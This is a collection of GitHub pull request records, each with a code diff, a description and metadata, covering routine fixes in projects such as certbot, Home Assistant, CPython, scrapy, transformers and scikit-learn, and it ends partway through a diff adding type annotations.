| 108
|
commaai/openpilot
| 9,322
|
pylint fixes
|
diff --git a/letsencrypt/client/challenge_util.py b/letsencrypt/client/challenge_util.py
index 69f351f7d8a..46b0602bee1 100644
--- a/letsencrypt/client/challenge_util.py
+++ b/letsencrypt/client/challenge_util.py
@@ -36,7 +36,7 @@ def dvsni_gen_cert(filepath, name, r_b64, nonce, key):
key.pem, [nonce + CONFIG.INVALID_EXT, name, ext])
with open(filepath, 'w') as chall_cert_file:
- chall_cert_file.write(cert_pem)
+ chall_cert_file.write(cert_pem)
return le_util.jose_b64encode(dvsni_s)
diff --git a/letsencrypt/client/recovery_token_challenge.py b/letsencrypt/client/recovery_token_challenge.py
index 04a3d3ec91a..56d401dad1c 100644
--- a/letsencrypt/client/recovery_token_challenge.py
+++ b/letsencrypt/client/recovery_token_challenge.py
@@ -3,9 +3,8 @@
.. note:: This challenge has not been implemented into the project yet
"""
-import display
-
from letsencrypt.client import challenge
+from letsencrypt.client import display
class RecoveryToken(challenge.Challenge):
diff --git a/letsencrypt/scripts/main.py b/letsencrypt/scripts/main.py
index 9030d8f6953..19c34cc64a1 100755
--- a/letsencrypt/scripts/main.py
+++ b/letsencrypt/scripts/main.py
@@ -201,7 +201,7 @@ def read_file(filename):
"""
try:
- return filename, file(filename, 'rU').read()
+ return filename, open(filename, 'rU').read()
except IOError as exc:
raise argparse.ArgumentTypeError(exc.strerror)
|
https://api.github.com/repos/certbot/certbot/pulls/132
|
2014-12-17T08:15:16Z
|
2014-12-22T00:51:10Z
|
2014-12-22T00:51:10Z
|
2016-05-06T19:21:26Z
| 403
|
certbot/certbot
| 690
|
|
Adjust error handling scope in samsungtv
|
diff --git a/homeassistant/components/samsungtv/bridge.py b/homeassistant/components/samsungtv/bridge.py
index 3a06a9ff906146..342c4f7f42937c 100644
--- a/homeassistant/components/samsungtv/bridge.py
+++ b/homeassistant/components/samsungtv/bridge.py
@@ -430,18 +430,16 @@ async def _async_get_remote_under_lock(self) -> SamsungTVWSAsyncRemote | None:
"""Create or return a remote control instance."""
if self._remote is None or not self._remote.is_alive():
# We need to create a new instance to reconnect.
+ LOGGER.debug("Create SamsungTVWSBridge for %s (%s)", CONF_NAME, self.host)
+ assert self.port
+ self._remote = SamsungTVWSAsyncRemote(
+ host=self.host,
+ port=self.port,
+ token=self.token,
+ timeout=TIMEOUT_WEBSOCKET,
+ name=VALUE_CONF_NAME,
+ )
try:
- LOGGER.debug(
- "Create SamsungTVWSBridge for %s (%s)", CONF_NAME, self.host
- )
- assert self.port
- self._remote = SamsungTVWSAsyncRemote(
- host=self.host,
- port=self.port,
- token=self.token,
- timeout=TIMEOUT_WEBSOCKET,
- name=VALUE_CONF_NAME,
- )
await self._remote.start_listening()
# This is only happening when the auth was switched to DENY
# A removed auth will lead to socket timeout because waiting for auth popup is just an open socket
|
## Proposed change
<!--
Describe the big picture of your changes here to communicate to the
maintainers why we should accept this pull request. If it fixes a bug
or resolves a feature request, be sure to link to that issue in the
additional information section.
-->
Contrary to the legacy library, the `SamsungTVWS` doesn't attempt to connect in the constructor or in the context manager.
This narrows the exception handling to cover only the `remote.open()` call, which is what can actually raise the exception.
See https://github.com/xchwarze/samsung-tv-ws-api/blob/d539372cb7dc93e7b94bb3fdf5cc57f585b69e45/samsungtvws/remote.py#L36-L56 for confirmation.
The tests were previously adjusted in #66651.
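A minimal sketch of the narrowed scope (hypothetical class, not the library API): construct the client outside the `try` block and guard only the call that actually connects.
```python
class FakeRemote:
    """Stand-in for a remote whose constructor does no I/O."""

    def __init__(self, host):
        self.host = host  # nothing here can raise a connection error

    def start_listening(self):
        raise ConnectionError("auth denied")  # only this call can fail

def get_remote(host):
    remote = FakeRemote(host)  # created outside the try block
    try:
        remote.start_listening()
    except ConnectionError:
        return None
    return remote

print(get_remote("192.168.0.10"))  # None: the failure is handled where it can occur
```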
## Type of change
<!--
What type of change does your PR introduce to Home Assistant?
NOTE: Please, check only 1! box!
If your PR requires multiple boxes to be checked, you'll most likely need to
split it into multiple PRs. This makes things easier and faster to code review.
-->
- [ ] Dependency upgrade
- [ ] Bugfix (non-breaking change which fixes an issue)
- [ ] New integration (thank you!)
- [ ] New feature (which adds functionality to an existing integration)
- [ ] Breaking change (fix/feature causing existing functionality to break)
- [x] Code quality improvements to existing code or addition of tests
## Additional information
<!--
Details are important, and help maintainers processing your PR.
Please be sure to fill out additional details, if applicable.
-->
- This PR fixes or closes issue: fixes #
- This PR is related to issue:
- Link to documentation pull request:
## Checklist
<!--
Put an `x` in the boxes that apply. You can also fill these out after
creating the PR. If you're unsure about any of them, don't hesitate to ask.
We're here to help! This is simply a reminder of what we are going to look
for before merging your code.
-->
- [ ] The code change is tested and works locally.
- [ ] Local tests pass. **Your PR cannot be merged unless tests pass**
- [ ] There is no commented out code in this PR.
- [ ] I have followed the [development checklist][dev-checklist]
- [ ] The code has been formatted using Black (`black --fast homeassistant tests`)
- [ ] Tests have been added to verify that the new code works.
If user exposed functionality or configuration variables are added/changed:
- [ ] Documentation added/updated for [www.home-assistant.io][docs-repository]
If the code communicates with devices, web services, or third-party tools:
- [ ] The [manifest file][manifest-docs] has all fields filled out correctly.
Updated and included derived files by running: `python3 -m script.hassfest`.
- [ ] New or updated dependencies have been added to `requirements_all.txt`.
Updated by running `python3 -m script.gen_requirements_all`.
- [ ] For the updated dependencies - a link to the changelog, or at minimum a diff between library versions is added to the PR description.
- [ ] Untested files have been added to `.coveragerc`.
The integration reached or maintains the following [Integration Quality Scale][quality-scale]:
<!--
The Integration Quality Scale scores an integration on the code quality
and user experience. Each level of the quality scale consists of a list
of requirements. We highly recommend getting your integration scored!
-->
- [ ] No score or internal
- [ ] 🥈 Silver
- [ ] 🥇 Gold
- [ ] 🏆 Platinum
<!--
This project is very active and we have a high turnover of pull requests.
Unfortunately, the number of incoming pull requests is higher than what our
reviewers can review and merge so there is a long backlog of pull requests
waiting for review. You can help here!
By reviewing another pull request, you will help raise the code quality of
that pull request and the final review will be faster. This way the general
pace of pull request reviews will go up and your wait time will go down.
When picking a pull request to review, try to choose one that hasn't yet
been reviewed.
Thanks for helping out!
-->
To help with the load of incoming pull requests:
- [ ] I have reviewed two other [open pull requests][prs] in this repository.
[prs]: https://github.com/home-assistant/core/pulls?q=is%3Aopen+is%3Apr+-author%3A%40me+-draft%3Atrue+-label%3Awaiting-for-upstream+sort%3Acreated-desc+review%3Anone+-status%3Afailure
<!--
Thank you for contributing <3
Below, some useful links you could explore:
-->
[dev-checklist]: https://developers.home-assistant.io/docs/en/development_checklist.html
[manifest-docs]: https://developers.home-assistant.io/docs/en/creating_integration_manifest.html
[quality-scale]: https://developers.home-assistant.io/docs/en/next/integration_quality_scale_index.html
[docs-repository]: https://github.com/home-assistant/home-assistant.io
|
https://api.github.com/repos/home-assistant/core/pulls/66692
|
2022-02-16T21:06:35Z
|
2022-03-02T19:52:12Z
|
2022-03-02T19:52:12Z
|
2022-03-03T20:01:55Z
| 351
|
home-assistant/core
| 38,884
|
gh-86618: Improve colorsys.rgb_to_hls code
|
diff --git a/Lib/colorsys.py b/Lib/colorsys.py
index b93e3844067e4e..0f52512a67d87c 100644
--- a/Lib/colorsys.py
+++ b/Lib/colorsys.py
@@ -75,17 +75,18 @@ def yiq_to_rgb(y, i, q):
def rgb_to_hls(r, g, b):
maxc = max(r, g, b)
minc = min(r, g, b)
- # XXX Can optimize (maxc+minc) and (maxc-minc)
- l = (minc+maxc)/2.0
+ sumc = (maxc+minc)
+ rangec = (maxc-minc)
+ l = sumc/2.0
if minc == maxc:
return 0.0, l, 0.0
if l <= 0.5:
- s = (maxc-minc) / (maxc+minc)
+ s = rangec / sumc
else:
- s = (maxc-minc) / (2.0-maxc-minc)
- rc = (maxc-r) / (maxc-minc)
- gc = (maxc-g) / (maxc-minc)
- bc = (maxc-b) / (maxc-minc)
+ s = rangec / (2.0-sumc)
+ rc = (maxc-r) / rangec
+ gc = (maxc-g) / rangec
+ bc = (maxc-b) / rangec
if r == maxc:
h = bc-gc
elif g == maxc:
|
Cache repeated sum and difference to make code slightly faster and easier to read.
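A quick sanity check that the refactor leaves results unchanged:
```python
import colorsys

# Only (maxc+minc) and (maxc-minc) are cached, so the output is identical.
print(colorsys.rgb_to_hls(0.2, 0.4, 0.4))  # (0.5, 0.3, 0.3333333333333333)
```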
<!-- gh-issue-number: gh-86618 -->
* Issue: gh-86618
<!-- /gh-issue-number -->
|
https://api.github.com/repos/python/cpython/pulls/23306
|
2020-11-15T22:58:18Z
|
2020-11-28T07:11:20Z
|
2020-11-28T07:11:20Z
|
2023-07-11T11:12:48Z
| 384
|
python/cpython
| 4,157
|
Potential fix for issues/571
|
diff --git a/modules/text_generation.py b/modules/text_generation.py
index fd017e2c1d..eb8f6ca17c 100644
--- a/modules/text_generation.py
+++ b/modules/text_generation.py
@@ -236,8 +236,6 @@ def generate_with_streaming(**kwargs):
break
yield formatted_outputs(reply, shared.model_name)
- yield formatted_outputs(reply, shared.model_name)
-
# Stream the output naively for FlexGen since it doesn't support 'stopping_criteria'
else:
for i in range(max_new_tokens//8+1):
|
It appears that the removed line was introduced as part of a merge conflict fix in https://github.com/oobabooga/text-generation-webui/commit/b3e10e47c05128bf477833d8261ea5bedecc9aac. Removing it makes the stack trace disappear from the logs and, I believe, results in one fewer emission of the final reply generated in the preceding loop.
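For illustration, a tiny stand-in for this bug class (not the webui code):
```python
def stream_replies(chunks):
    reply = ""
    for chunk in chunks:
        reply += chunk
        yield reply
    # yield reply  # the duplicated final yield that this PR removes

print(list(stream_replies(["a", "b"])))  # ['a', 'ab'], no trailing duplicate
```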
|
https://api.github.com/repos/oobabooga/text-generation-webui/pulls/572
|
2023-03-25T20:11:56Z
|
2023-03-27T17:06:38Z
|
2023-03-27T17:06:38Z
|
2023-03-27T21:01:00Z
| 129
|
oobabooga/text-generation-webui
| 26,696
|
Fix GraphScene and NumberLine
|
diff --git a/manimlib/mobject/number_line.py b/manimlib/mobject/number_line.py
index 1e50692e7f..8736ee6cbd 100644
--- a/manimlib/mobject/number_line.py
+++ b/manimlib/mobject/number_line.py
@@ -99,7 +99,7 @@ def get_tick(self, x, size=None):
return result
def get_tick_marks(self):
- return self.tick_marks
+ return self.ticks
def number_to_point(self, number):
alpha = float(number - self.x_min) / (self.x_max - self.x_min)
diff --git a/manimlib/scene/graph_scene.py b/manimlib/scene/graph_scene.py
index 6bfc6d34d5..cc3faf78f7 100644
--- a/manimlib/scene/graph_scene.py
+++ b/manimlib/scene/graph_scene.py
@@ -82,7 +82,7 @@ def setup_axes(self, animate=False):
if len(self.x_labeled_nums) > 0:
if self.exclude_zero_label:
self.x_labeled_nums = [x for x in self.x_labeled_nums if x != 0]
- x_axis.add_numbers(*self.x_labeled_nums)
+ x_axis.add_numbers(self.x_labeled_nums)
if self.x_axis_label:
x_label = TexText(self.x_axis_label)
x_label.next_to(
@@ -116,7 +116,7 @@ def setup_axes(self, animate=False):
if len(self.y_labeled_nums) > 0:
if self.exclude_zero_label:
self.y_labeled_nums = [y for y in self.y_labeled_nums if y != 0]
- y_axis.add_numbers(*self.y_labeled_nums)
+ y_axis.add_numbers(self.y_labeled_nums)
if self.y_axis_label:
y_label = TexText(self.y_axis_label)
y_label.next_to(
|
<!-- Thanks for contributing to manim!
Please ensure that your pull request works with the latest version of manim.
-->
## Motivation
<!-- Outline your motivation: In what way do your changes improve the library? -->
Fixed #1354.
This temporarily fixes the problem that occurs when `GraphScene` calls `NumberLine`.
But I am not sure if it is necessary to continue to support `GraphScene`. If needed, then more adaptive changes should be made to `GraphScene`; if not, then it should be deleted.
## Proposed changes
<!-- What you changed in those files -->
- Change `self.tick_marks` to `self.ticks`
- Do not unpack when passing the value to `add_numbers()`
## Test
<!-- How do you test your changes -->
**Code**: The code in #1354
```python
class Plot2yLabelNumbers(GraphScene):
CONFIG = {
"y_min": 0,
"y_max": 100,
"y_axis_config": {"tick_frequency": 10},
"y_labeled_nums": np.arange(0, 100, 10)
}
def construct(self):
self.setup_axes()
dot = Dot().move_to(self.coords_to_point(PI / 2, 20))
func_graph = self.get_graph(lambda x: 20 * np.sin(x))
self.add(dot,func_graph)
```
**Result**:

|
https://api.github.com/repos/3b1b/manim/pulls/1355
|
2021-02-05T06:06:29Z
|
2021-02-05T22:51:47Z
|
2021-02-05T22:51:47Z
|
2021-02-05T22:52:49Z
| 427
|
3b1b/manim
| 18,238
|
Specify python2 and clarify coverage requirements
|
diff --git a/bootstrap/dev/venv.sh b/bootstrap/dev/venv.sh
index 90088ac9bb7..d6cf95bb59c 100755
--- a/bootstrap/dev/venv.sh
+++ b/bootstrap/dev/venv.sh
@@ -1,6 +1,8 @@
#!/bin/sh -xe
# Developer virtualenv setup for Let's Encrypt client
+export VENV_ARGS="--python python2"
+
./bootstrap/dev/_venv_common.sh \
-r requirements.txt \
-e acme[testing] \
diff --git a/docs/contributing.rst b/docs/contributing.rst
index 3959ccee10e..3277d321a7b 100644
--- a/docs/contributing.rst
+++ b/docs/contributing.rst
@@ -7,9 +7,9 @@ Contributing
Hacking
=======
-The code base, including your pull requests, **must** have 100% unit
-test coverage, pass our `integration`_ tests **and** be compliant with
-the :ref:`coding style <coding-style>`.
+All changes in your pull request **must** have 100% unit test coverage, pass
+our `integration`_ tests, **and** be compliant with the
+:ref:`coding style <coding-style>`.
Bootstrap
|
Please take a look at this @kuba. Not sure how I missed this yesterday. `venv.sh` needs to specify `python2` (Arch problems) and we can't require contributors to have 100% unit test coverage of the code base as that's not something we currently have.
|
https://api.github.com/repos/certbot/certbot/pulls/910
|
2015-10-06T17:54:16Z
|
2015-10-06T18:22:21Z
|
2015-10-06T18:22:21Z
|
2016-05-06T19:22:29Z
| 290
|
certbot/certbot
| 3,406
|
Check if file is already present on running `scrapy genspider` and terminate if so (#4561)
|
diff --git a/scrapy/commands/genspider.py b/scrapy/commands/genspider.py
index 4c7548e9cac..74a077d1b7b 100644
--- a/scrapy/commands/genspider.py
+++ b/scrapy/commands/genspider.py
@@ -66,16 +66,9 @@ def run(self, args, opts):
print("Cannot create a spider with the same name as your project")
return
- try:
- spidercls = self.crawler_process.spider_loader.load(name)
- except KeyError:
- pass
- else:
- # if spider already exists and not --force then halt
- if not opts.force:
- print("Spider %r already exists in module:" % name)
- print(" %s" % spidercls.__module__)
- return
+ if not opts.force and self._spider_exists(name):
+ return
+
template_file = self._find_template(opts.template)
if template_file:
self._genspider(module, name, domain, opts.template, template_file)
@@ -119,6 +112,34 @@ def _list_templates(self):
if filename.endswith('.tmpl'):
print(" %s" % splitext(filename)[0])
+ def _spider_exists(self, name):
+ if not self.settings.get('NEWSPIDER_MODULE'):
+ # if run as a standalone command and file with same filename already exists
+ if exists(name + ".py"):
+ print("%s already exists" % (abspath(name + ".py")))
+ return True
+ return False
+
+ try:
+ spidercls = self.crawler_process.spider_loader.load(name)
+ except KeyError:
+ pass
+ else:
+ # if spider with same name exists
+ print("Spider %r already exists in module:" % name)
+ print(" %s" % spidercls.__module__)
+ return True
+
+ # a file with the same name exists in the target directory
+ spiders_module = import_module(self.settings['NEWSPIDER_MODULE'])
+ spiders_dir = dirname(spiders_module.__file__)
+ spiders_dir_abs = abspath(spiders_dir)
+ if exists(join(spiders_dir_abs, name + ".py")):
+ print("%s already exists" % (join(spiders_dir_abs, (name + ".py"))))
+ return True
+
+ return False
+
@property
def templates_dir(self):
return join(
diff --git a/tests/test_commands.py b/tests/test_commands.py
index 42091ab0041..54ee389332c 100644
--- a/tests/test_commands.py
+++ b/tests/test_commands.py
@@ -8,7 +8,7 @@
import tempfile
from contextlib import contextmanager
from itertools import chain
-from os.path import exists, join, abspath
+from os.path import exists, join, abspath, getmtime
from pathlib import Path
from shutil import rmtree, copytree
from stat import S_IWRITE as ANYONE_WRITE_PERMISSION
@@ -337,8 +337,11 @@ def test_template(self, tplname='crawl'):
p, out, err = self.proc('genspider', spname, 'test.com', *args)
self.assertIn("Created spider %r using template %r in module" % (spname, tplname), out)
self.assertTrue(exists(join(self.proj_mod_path, 'spiders', 'test_spider.py')))
+ modify_time_before = getmtime(join(self.proj_mod_path, 'spiders', 'test_spider.py'))
p, out, err = self.proc('genspider', spname, 'test.com', *args)
self.assertIn("Spider %r already exists in module" % spname, out)
+ modify_time_after = getmtime(join(self.proj_mod_path, 'spiders', 'test_spider.py'))
+ self.assertEqual(modify_time_after, modify_time_before)
def test_template_basic(self):
self.test_template('basic')
@@ -360,6 +363,40 @@ def test_same_name_as_project(self):
self.assertEqual(2, self.call('genspider', self.project_name))
assert not exists(join(self.proj_mod_path, 'spiders', '%s.py' % self.project_name))
+ def test_same_filename_as_existing_spider(self, force=False):
+ file_name = 'example'
+ file_path = join(self.proj_mod_path, 'spiders', '%s.py' % file_name)
+ self.assertEqual(0, self.call('genspider', file_name, 'example.com'))
+ assert exists(file_path)
+
+ # change name of spider but not its file name
+ with open(file_path, 'r+') as spider_file:
+ file_data = spider_file.read()
+ file_data = file_data.replace("name = \'example\'", "name = \'renamed\'")
+ spider_file.seek(0)
+ spider_file.write(file_data)
+ spider_file.truncate()
+ modify_time_before = getmtime(file_path)
+ file_contents_before = file_data
+
+ if force:
+ p, out, err = self.proc('genspider', '--force', file_name, 'example.com')
+ self.assertIn("Created spider %r using template \'basic\' in module" % file_name, out)
+ modify_time_after = getmtime(file_path)
+ self.assertNotEqual(modify_time_after, modify_time_before)
+ file_contents_after = open(file_path, 'r').read()
+ self.assertNotEqual(file_contents_after, file_contents_before)
+ else:
+ p, out, err = self.proc('genspider', file_name, 'example.com')
+ self.assertIn("%s already exists" % (file_path), out)
+ modify_time_after = getmtime(file_path)
+ self.assertEqual(modify_time_after, modify_time_before)
+ file_contents_after = open(file_path, 'r').read()
+ self.assertEqual(file_contents_after, file_contents_before)
+
+ def test_same_filename_as_existing_spider_force(self):
+ self.test_same_filename_as_existing_spider(force=True)
+
class GenspiderStandaloneCommandTest(ProjectTest):
@@ -367,6 +404,34 @@ def test_generate_standalone_spider(self):
self.call('genspider', 'example', 'example.com')
assert exists(join(self.temp_path, 'example.py'))
+ def test_same_name_as_existing_file(self, force=False):
+ file_name = 'example'
+ file_path = join(self.temp_path, file_name + '.py')
+ p, out, err = self.proc('genspider', file_name, 'example.com')
+ self.assertIn("Created spider %r using template \'basic\' " % file_name, out)
+ assert exists(file_path)
+ modify_time_before = getmtime(file_path)
+ file_contents_before = open(file_path, 'r').read()
+
+ if force:
+ # use different template to ensure contents were changed
+ p, out, err = self.proc('genspider', '--force', '-t', 'crawl', file_name, 'example.com')
+ self.assertIn("Created spider %r using template \'crawl\' " % file_name, out)
+ modify_time_after = getmtime(file_path)
+ self.assertNotEqual(modify_time_after, modify_time_before)
+ file_contents_after = open(file_path, 'r').read()
+ self.assertNotEqual(file_contents_after, file_contents_before)
+ else:
+ p, out, err = self.proc('genspider', file_name, 'example.com')
+ self.assertIn("%s already exists" % join(self.temp_path, file_name + ".py"), out)
+ modify_time_after = getmtime(file_path)
+ self.assertEqual(modify_time_after, modify_time_before)
+ file_contents_after = open(file_path, 'r').read()
+ self.assertEqual(file_contents_after, file_contents_before)
+
+ def test_same_name_as_existing_file_force(self):
+ self.test_same_name_as_existing_file(force=True)
+
class MiscCommandsTest(CommandTest):
|
Continuing from PR #4616 to fix #4561, I've added a direct file check that detects whether a spider with the name provided to `scrapy genspider` is already present in the target directory, so the command no longer overwrites an existing spider file in that case.
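A minimal sketch of the standalone-mode part of the check (simplified from `_spider_exists` in the diff; the project-mode branch additionally looks inside the `NEWSPIDER_MODULE` directory):
```python
from os.path import abspath, exists

# When genspider runs outside a project, only a file named <spider>.py in the
# current directory needs to be checked before generating the new spider.
def spider_file_exists(name: str) -> bool:
    path = name + ".py"
    if exists(path):
        print(f"{abspath(path)} already exists")
        return True
    return False
```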
|
https://api.github.com/repos/scrapy/scrapy/pulls/4623
|
2020-06-10T17:32:46Z
|
2020-08-17T08:45:53Z
|
2020-08-17T08:45:53Z
|
2020-08-17T08:46:00Z
| 1,788
|
scrapy/scrapy
| 35,100
|
Report value for a step instead of epoch.
|
diff --git a/src/transformers/trainer.py b/src/transformers/trainer.py
index 0bebc8626ba6b..0359a913b0c4a 100755
--- a/src/transformers/trainer.py
+++ b/src/transformers/trainer.py
@@ -1138,16 +1138,14 @@ def _hp_search_setup(self, trial: Union["optuna.Trial", Dict[str, Any]]):
self.args.hf_deepspeed_config = HfTrainerDeepSpeedConfig(self.args.deepspeed)
self.args.hf_deepspeed_config.trainer_config_process(self.args)
- def _report_to_hp_search(
- self, trial: Union["optuna.Trial", Dict[str, Any]], epoch: int, metrics: Dict[str, float]
- ):
+ def _report_to_hp_search(self, trial: Union["optuna.Trial", Dict[str, Any]], step: int, metrics: Dict[str, float]):
if self.hp_search_backend is None or trial is None:
return
self.objective = self.compute_objective(metrics.copy())
if self.hp_search_backend == HPSearchBackend.OPTUNA:
import optuna
- trial.report(self.objective, epoch)
+ trial.report(self.objective, step)
if trial.should_prune():
self.callback_handler.on_train_end(self.args, self.state, self.control)
raise optuna.TrialPruned()
@@ -1916,7 +1914,7 @@ def _maybe_log_save_evaluate(self, tr_loss, model, trial, epoch, ignore_keys_for
metrics = None
if self.control.should_evaluate:
metrics = self.evaluate(ignore_keys=ignore_keys_for_eval)
- self._report_to_hp_search(trial, epoch, metrics)
+ self._report_to_hp_search(trial, self.state.global_step, metrics)
if self.control.should_save:
self._save_checkpoint(model, trial, metrics=metrics)
|
# What does this PR do?
Report an objective function value for a step instead of epoch to optuna.
## I made this modification for the following reason:
If "eval_steps" is less than steps per epoch, there maybe warnings: `optuna/trial/_trial.py:592: UserWarning: The reported value is ignored because this ‘step’ 0 is already reported.`. This is because the epoch granularity is too coarse. So "step" are more appropriate than "epoch" here.
## Who can review?
Anyone in the community is free to review the PR once the tests have passed.
@sgugger @LysandreJik
|
https://api.github.com/repos/huggingface/transformers/pulls/18095
|
2022-07-11T12:11:19Z
|
2022-07-12T12:18:35Z
|
2022-07-12T12:18:35Z
|
2022-07-12T12:30:23Z
| 430
|
huggingface/transformers
| 12,545
|
[MRG+1] TST: More tests for Ledoit-Wolf
|
diff --git a/sklearn/covariance/shrunk_covariance_.py b/sklearn/covariance/shrunk_covariance_.py
index 3187ab8f25d38..86f1545abba13 100644
--- a/sklearn/covariance/shrunk_covariance_.py
+++ b/sklearn/covariance/shrunk_covariance_.py
@@ -198,6 +198,9 @@ def ledoit_wolf_shrinkage(X, assume_centered=False, block_size=1000):
if not assume_centered:
X = X - X.mean(0)
+ # A non-blocked version of the computation is present in the tests
+ # in tests/test_covariance.py
+
# number of blocks to split the covariance matrix into
n_splits = int(n_features / block_size)
X2 = X ** 2
@@ -232,6 +235,8 @@ def ledoit_wolf_shrinkage(X, assume_centered=False, block_size=1000):
delta = delta_ - 2. * mu * emp_cov_trace.sum() + n_features * mu ** 2
delta /= n_features
# get final beta as the min between beta and delta
+ # We do this to prevent shrinking more than "1", which would invert
+ # the value of covariances
beta = min(beta, delta)
# finally get shrinkage
shrinkage = 0 if beta == 0 else beta / delta
diff --git a/sklearn/covariance/tests/test_covariance.py b/sklearn/covariance/tests/test_covariance.py
index 1179714cc24bb..b19fbcfb9e29c 100644
--- a/sklearn/covariance/tests/test_covariance.py
+++ b/sklearn/covariance/tests/test_covariance.py
@@ -112,6 +112,7 @@ def test_ledoit_wolf():
lw = LedoitWolf(assume_centered=True)
lw.fit(X_centered)
shrinkage_ = lw.shrinkage_
+
score_ = lw.score(X_centered)
assert_almost_equal(ledoit_wolf_shrinkage(X_centered,
assume_centered=True),
@@ -186,6 +187,38 @@ def test_ledoit_wolf():
assert(lw.precision_ is None)
+def _naive_ledoit_wolf_shrinkage(X):
+ # A simple implementation of the formulas from Ledoit & Wolf
+
+ # The computation below achieves the following computations of the
+ # "O. Ledoit and M. Wolf, A Well-Conditioned Estimator for
+ # Large-Dimensional Covariance Matrices"
+ # beta and delta are given in the beginning of section 3.2
+ n_samples, n_features = X.shape
+ emp_cov = empirical_covariance(X, assume_centered=False)
+ mu = np.trace(emp_cov) / n_features
+ delta_ = emp_cov.copy()
+ delta_.flat[::n_features + 1] -= mu
+ delta = (delta_ ** 2).sum() / n_features
+ X2 = X ** 2
+ beta_ = 1. / (n_features * n_samples) \
+ * np.sum(np.dot(X2.T, X2) / n_samples - emp_cov ** 2)
+
+ beta = min(beta_, delta)
+ shrinkage = beta / delta
+ return shrinkage
+
+
+def test_ledoit_wolf_small():
+ # Compare our blocked implementation to the naive implementation
+ X_small = X[:, :4]
+ lw = LedoitWolf()
+ lw.fit(X_small)
+ shrinkage_ = lw.shrinkage_
+
+ assert_almost_equal(shrinkage_, _naive_ledoit_wolf_shrinkage(X_small))
+
+
def test_ledoit_wolf_large():
# test that ledoit_wolf doesn't error on data that is wider than block_size
rng = np.random.RandomState(0)
|
Fixes #6195
Indeed, #6195 was not a bug: the code in scikit-learn is correct.
However, it is fairly hard to convince oneself that this is the case.
This commit adds tests that are easier to read and relate to the
publication.
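For quick reference, a minimal sketch of the quantities the naive test computes (notation follows the code in `_naive_ledoit_wolf_shrinkage` rather than the exact symbols of the paper; here $S$ is the empirical covariance, $p$ the number of features, $n$ the number of samples, and squares of $X$ and $S$ are element-wise):
```latex
% Quantities mirrored from the naive test implementation
\mu = \frac{\operatorname{tr}(S)}{p}, \qquad
\delta = \frac{\lVert S - \mu I \rVert_F^2}{p}, \qquad
\hat{\beta} = \frac{1}{p\,n} \sum_{i,j}
  \left[ \frac{(X^{2})^{\top} X^{2}}{n} - S^{2} \right]_{ij}, \qquad
\beta = \min(\hat{\beta}, \delta), \qquad
\text{shrinkage} = \frac{\beta}{\delta}.
```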
|
https://api.github.com/repos/scikit-learn/scikit-learn/pulls/6201
|
2016-01-20T21:28:08Z
|
2016-01-27T10:12:02Z
|
2016-01-27T10:12:02Z
|
2016-01-27T10:12:02Z
| 892
|
scikit-learn/scikit-learn
| 46,281
|
Update latency vs throughput blog link
|
diff --git a/README.md b/README.md
index 9f0be48611..0e2c40ec67 100644
--- a/README.md
+++ b/README.md
@@ -433,7 +433,7 @@ Generally, you should aim for **maximal throughput** with **acceptable latency**
### Source(s) and further reading
-* [Understanding latency vs throughput](https://community.cadence.com/cadence_blogs_8/b/sd/archive/2010/09/13/understanding-latency-vs-throughput)
+* [Understanding latency vs throughput](https://community.cadence.com/cadence_blogs_8/b/fv/posts/understanding-latency-vs-throughput)
## Availability vs consistency
|
## Review the Contributing Guidelines
Before submitting a pull request, verify it meets all requirements in the [Contributing Guidelines](https://github.com/donnemartin/system-design-primer/blob/master/CONTRIBUTING.md).
### Translations
See the [Contributing Guidelines](https://github.com/donnemartin/system-design-primer/blob/master/CONTRIBUTING.md). Verify you've:
* Tagged the [language maintainer](https://github.com/donnemartin/system-design-primer/blob/master/TRANSLATIONS.md)
* Prefixed the title with a language code
* Example: "ja: Fix ..."
|
https://api.github.com/repos/donnemartin/system-design-primer/pulls/716
|
2022-11-06T18:02:12Z
|
2022-11-13T21:04:18Z
|
2022-11-13T21:04:18Z
|
2022-11-13T21:04:30Z
| 162
|
donnemartin/system-design-primer
| 36,779
|
Make sure eval subset is sampled without replacing
|
diff --git a/model/model_training/custom_datasets/__init__.py b/model/model_training/custom_datasets/__init__.py
index 50f0a1bf6e..4c66d06008 100644
--- a/model/model_training/custom_datasets/__init__.py
+++ b/model/model_training/custom_datasets/__init__.py
@@ -196,7 +196,7 @@ def get_one_dataset(
train, eval = train_val_dataset(dataset, val_split=val_split)
if eval and max_val_set and len(eval) > max_val_set:
- subset_indices = np.random.choice(len(eval), max_val_set)
+ subset_indices = np.random.choice(len(eval), size=max_val_set, replace=False)
eval = Subset(eval, subset_indices)
return train, eval
|
Explicitly specify `replace=False` for [numpy.random.choice](https://numpy.org/doc/stable/reference/random/generated/numpy.random.choice.html) (it was missing, and the default `replace=True` could lead to duplicate examples in the evaluation set).
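A minimal sketch of the difference (plain numpy, outside the dataset code):
```python
import numpy as np

np.random.seed(0)

# With the default replace=True the same index can be drawn more than once,
# so the evaluation subset may contain duplicate examples.
with_replacement = np.random.choice(10, size=8)

# With replace=False every drawn index is unique.
without_replacement = np.random.choice(10, size=8, replace=False)

assert len(set(without_replacement)) == len(without_replacement)
```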
|
https://api.github.com/repos/LAION-AI/Open-Assistant/pulls/3651
|
2023-08-12T21:44:28Z
|
2023-08-14T10:44:37Z
|
2023-08-14T10:44:37Z
|
2023-08-14T10:44:38Z
| 167
|
LAION-AI/Open-Assistant
| 37,285
|
[mypy] Add/fix type annotations for bit manipulation algorithms
|
diff --git a/bit_manipulation/binary_and_operator.py b/bit_manipulation/binary_and_operator.py
index f1b910f8cc9b..191ff8eb44a4 100644
--- a/bit_manipulation/binary_and_operator.py
+++ b/bit_manipulation/binary_and_operator.py
@@ -1,7 +1,7 @@
# https://www.tutorialspoint.com/python3/bitwise_operators_example.htm
-def binary_and(a: int, b: int):
+def binary_and(a: int, b: int) -> str:
"""
Take in 2 integers, convert them to binary,
return a binary number that is the
diff --git a/bit_manipulation/binary_or_operator.py b/bit_manipulation/binary_or_operator.py
index e83a86d6a8bc..dabf5bcb09fd 100644
--- a/bit_manipulation/binary_or_operator.py
+++ b/bit_manipulation/binary_or_operator.py
@@ -1,7 +1,7 @@
# https://www.tutorialspoint.com/python3/bitwise_operators_example.htm
-def binary_or(a: int, b: int):
+def binary_or(a: int, b: int) -> str:
"""
Take in 2 integers, convert them to binary, and return a binary number that is the
result of a binary or operation on the integers provided.
diff --git a/bit_manipulation/binary_xor_operator.py b/bit_manipulation/binary_xor_operator.py
index 0edf2ba6606d..6f8962192ad8 100644
--- a/bit_manipulation/binary_xor_operator.py
+++ b/bit_manipulation/binary_xor_operator.py
@@ -1,7 +1,7 @@
